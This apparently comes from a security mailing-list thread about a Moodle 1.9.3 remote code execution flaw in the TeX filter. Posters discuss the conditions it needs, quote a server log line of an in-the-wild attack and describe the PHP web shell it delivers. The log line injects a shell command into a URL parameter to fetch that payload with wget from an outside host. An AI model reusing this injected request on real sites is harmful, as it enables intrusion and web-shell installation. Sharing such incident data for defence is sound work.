Re: Moodle 1.9.3 Remote Code Execution

[hackeriri]

when try this exploit, the result is:
Filter not enabled!

i think, this exploit need two conditions:
1- register_globals = ON
2- "text" filter must be enabled

Re: Re: Moodle 1.9.3 Remote Code Execution

[martin]

Similar hacks have been discussed here:



   http://moodle.org/mod/forum/discuss.php?d=111710#p490453



Affected sites seem to be all running PHP with register_global turned on, which 
is a really bad idea and not recommended by Moodle.

Re: Moodle 1.9.3 Remote Code Execution

[Jamie Riden]

2008/12/15  :
> Exploit in the wild:
>
> We saw this come across:
>
> 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET 
> /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
> perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218
>
>
> The host perso.wanadoo.es is still host the payload as of 
> [15/Dec/2008:00:14:00 -0500].

Looks like the usual sort of script to do things like execute
commands, upload/touch/delete files and eval() PHP. Only unusual in
that it's relatively clean and small.

I thought it was obfuscated at first glance, but it's just compressed
- only takes a couple of minutes to turn it into readable source.
(Just need to change ";eval($t) ?>" at the end to ";echo($t) ?>" and
run it from the CLI. Then add line breaks and formatting as required.)

cheers,
 Jamie
-- 
Jamie Riden / jam...@europe.com / ja...@honeynet.org.uk
http://www.ukhoneynet.org/members/jamie/

Re: Moodle 1.9.3 Remote Code Execution

[lent]

Exploit in the wild:

We saw this come across:

216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET 
/filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O 
perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218


The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 
-0500].

Chris Lent
Tel: +1.212.353.4350